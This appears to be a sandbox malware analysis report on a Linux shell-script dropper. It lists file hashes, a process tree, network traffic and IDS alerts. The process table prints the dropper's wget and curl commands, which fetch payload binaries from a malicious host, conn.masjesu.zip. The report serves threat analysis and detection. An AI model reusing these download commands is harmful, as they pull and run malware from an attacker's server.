File name: | 9a604364291250bee8b4c8f177b0c2219c513b0f340befb97284a702d3e90269.sh |
Full analysis: | https://app.any.run/tasks/8daa1abf-c0c0-40da-b5e2-7f0ddd5c7796 |
Verdict: | Malicious activity |
Analysis date: | January 10, 2025, 20:32:22 |
OS: | Ubuntu 22.04.2 LTS |
Tags: | |
Indicators: | |
MIME: | text/x-shellscript |
File info: | Bourne-Again shell script, ASCII text executable, with very long lines (417) |
MD5: | AFB9E2F38F3742C37A4038392B36172C |
SHA1: | 9CD91F7DD7D7DA023C720043EC2489454EA10BD4 |
SHA256: | 9A604364291250BEE8B4C8F177B0C2219C513B0F340BEFB97284A702D3E90269 |
SSDEEP: | 96:YfsXfafsosRULG2LXG1GVGtW6arfArf8rfnfMfsf/LFlAL1V1hZCUfzUJLDfUyGx:fgAtW6A62fwQ/w4p4okgAtW6W62fwQEh |
.sh | | | Linux/UNIX shell script (100) |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
38752 | /bin/sh -c "sudo chown user /tmp/9a604364291250bee8b4c8f177b0c2219c513b0f340befb97284a702d3e90269\.sh && chmod +x /tmp/9a604364291250bee8b4c8f177b0c2219c513b0f340befb97284a702d3e90269\.sh && DISPLAY=:0 sudo -iu user /tmp/9a604364291250bee8b4c8f177b0c2219c513b0f340befb97284a702d3e90269\.sh " | /usr/bin/dash | — | any-guest-agent |
User: user Integrity Level: UNKNOWN Exit code: 256 | ||||
38753 | sudo chown user /tmp/9a604364291250bee8b4c8f177b0c2219c513b0f340befb97284a702d3e90269.sh | /usr/bin/sudo | — | dash |
User: root Integrity Level: UNKNOWN Exit code: 0 | ||||
38754 | chown user /tmp/9a604364291250bee8b4c8f177b0c2219c513b0f340befb97284a702d3e90269.sh | /usr/bin/chown | — | sudo |
User: root Integrity Level: UNKNOWN Exit code: 0 | ||||
38755 | chmod +x /tmp/9a604364291250bee8b4c8f177b0c2219c513b0f340befb97284a702d3e90269.sh | /usr/bin/chmod | — | dash |
User: user Integrity Level: UNKNOWN Exit code: 0 | ||||
38756 | sudo -iu user /tmp/9a604364291250bee8b4c8f177b0c2219c513b0f340befb97284a702d3e90269.sh | /usr/bin/sudo | — | dash |
User: root Integrity Level: UNKNOWN Exit code: 256 | ||||
38757 | /bin/bash /tmp/9a604364291250bee8b4c8f177b0c2219c513b0f340befb97284a702d3e90269.sh | /usr/bin/bash | — | sudo |
User: user Integrity Level: UNKNOWN Exit code: 256 | ||||
38758 | /usr/bin/locale-check C.UTF-8 | /usr/bin/locale-check | — | bash |
User: user Integrity Level: UNKNOWN Exit code: 0 | ||||
38759 | /bin/rm bins.sh | /usr/bin/rm | — | bash |
User: user Integrity Level: UNKNOWN Exit code: 256 | ||||
38760 | wget http://conn.masjesu.zip/bins/CvOk1lhAVDTKW6AFJLijK4oJUR2nZR65Dn | /usr/bin/wget | bash | |
User: user Integrity Level: UNKNOWN Exit code: 2048 | ||||
38763 | /snap/curl/1754/bin/curl -O http://conn.masjesu.zip/bins/CvOk1lhAVDTKW6AFJLijK4oJUR2nZR65Dn | /snap/curl/1754/bin/curl | bash | |
User: user Integrity Level: UNKNOWN Exit code: 0 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
38763 | curl | GET | 404 | 66.63.187.225:80 | http://conn.masjesu.zip/bins/CvOk1lhAVDTKW6AFJLijK4oJUR2nZR65Dn | unknown | — | — | malicious |
— | — | GET | 204 | 185.125.190.96:80 | http://connectivity-check.ubuntu.com/ | unknown | — | — | whitelisted |
38801 | busybox | GET | 404 | 66.63.187.225:80 | http://conn.masjesu.zip/bins/CvOk1lhAVDTKW6AFJLijK4oJUR2nZR65Dn | unknown | — | — | malicious |
38812 | wget | GET | 404 | 66.63.187.225:80 | http://conn.masjesu.zip/bins/rkFCEnq4Y0chQm3h8jfn4SBolapFF9Br2d | unknown | — | — | malicious |
38760 | wget | GET | 404 | 66.63.187.225:80 | http://conn.masjesu.zip/bins/CvOk1lhAVDTKW6AFJLijK4oJUR2nZR65Dn | unknown | — | — | malicious |
38814 | curl | GET | 404 | 66.63.187.225:80 | http://conn.masjesu.zip/bins/rkFCEnq4Y0chQm3h8jfn4SBolapFF9Br2d | unknown | — | — | malicious |
38839 | busybox | GET | 404 | 66.63.187.225:80 | http://conn.masjesu.zip/bins/rkFCEnq4Y0chQm3h8jfn4SBolapFF9Br2d | unknown | — | — | malicious |
38846 | wget | GET | 404 | 66.63.187.225:80 | http://conn.masjesu.zip/bins/RSzABe1HdghGSdusdqhQyr6NkKIY8uTiDK | unknown | — | — | malicious |
— | — | GET | 404 | 66.63.187.225:80 | http://conn.masjesu.zip/bins/PP2XiBBfxosVxAhRVY9WrON1BYWIBYMYjV | unknown | — | — | malicious |
— | — | GET | 404 | 66.63.187.225:80 | http://conn.masjesu.zip/bins/RSzABe1HdghGSdusdqhQyr6NkKIY8uTiDK | unknown | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 185.125.190.18:80 | — | Canonical Group Limited | GB | unknown |
— | — | 185.125.190.96:80 | connectivity-check.ubuntu.com | Canonical Group Limited | GB | whitelisted |
484 | avahi-daemon | 224.0.0.251:5353 | — | — | — | unknown |
1178 | snap-store | 212.102.56.179:443 | odrs.gnome.org | Datacamp Limited | DE | whitelisted |
38760 | wget | 66.63.187.225:80 | conn.masjesu.zip | QUADRANET-INTERNET-SERVICES | US | malicious |
38763 | curl | 66.63.187.225:80 | conn.masjesu.zip | QUADRANET-INTERNET-SERVICES | US | malicious |
38801 | busybox | 66.63.187.225:80 | conn.masjesu.zip | QUADRANET-INTERNET-SERVICES | US | malicious |
512 | snapd | 185.125.188.58:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted |
38812 | wget | 66.63.187.225:80 | conn.masjesu.zip | QUADRANET-INTERNET-SERVICES | US | malicious |
38814 | curl | 66.63.187.225:80 | conn.masjesu.zip | QUADRANET-INTERNET-SERVICES | US | malicious |
Domain | IP | Reputation |
---|---|---|
connectivity-check.ubuntu.com |
| whitelisted |
google.com |
| whitelisted |
odrs.gnome.org |
| whitelisted |
conn.masjesu.zip |
| unknown |
api.snapcraft.io |
| whitelisted |
48.100.168.192.in-addr.arpa |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
— | — | Misc activity | ET INFO Observed DNS Query to .zip TLD |
— | — | Misc activity | ET INFO Observed DNS Query to .zip TLD |
— | — | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 7 |
— | — | Misc activity | ET INFO HTTP Request to a *.zip Domain |
— | — | Misc activity | ET INFO Observed DNS Query to .zip TLD |
— | — | Misc activity | ET INFO HTTP Request to a *.zip Domain |
— | — | Misc activity | ET INFO Observed DNS Query to .zip TLD |
— | — | Misc activity | ET INFO Observed DNS Query to .zip TLD |
— | — | Misc activity | ET INFO HTTP Request to a *.zip Domain |
— | — | Misc activity | ET INFO HTTP Request to a *.zip Domain |